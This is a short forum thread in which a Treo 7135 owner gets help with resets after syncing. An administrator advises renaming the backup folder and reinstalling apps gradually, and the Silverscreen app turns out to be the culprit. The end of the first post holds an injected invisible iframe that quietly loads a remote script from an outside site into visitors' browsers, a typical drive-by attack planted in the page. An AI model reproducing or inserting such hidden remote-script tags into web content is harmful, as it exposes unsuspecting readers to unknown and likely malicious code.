+ Reply to Thread

7135 needs reset after each sync

Obviously I have a major problem. Tried re-installing palm and pocketmirror software a number of times and no luck.

Does anyone have a suggestion?

Anyway to clear internal memory of all programs I installed after I bought to try to clean up any bad files? just the normal apps plus silverscreen. Having issue with syncing Outlook as I am missing Outlook Interface according to sync log. Does not import address book to 7135.

Any ideas are appreciated. Joe<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    silverscreen has some issues...

did you rename your backup folder and then do a virgin sync? that would rebuild your backup folder and you can then start to load apps... i would do them manually.. a couple at a time .. to see if any of them are causing your resets...

Marctronixx,

Didn't rename or do the virgin sync.

What's the best way to remedy? I see some files under silver in FileManager. Delete? I can always re-install. Thanks much!

Administrator
    yeah, you can just rename your backup folder so it wont get overwritten and the palm db wont try to restore from it. that way you can manually install apps a couple at a time and see if one (or more) of them is causing the resets...

You're the man! Thanks marctronixx.

Silverscreen definitely has some issues....Removed it and this baby is humming now. Thanks very much for the help.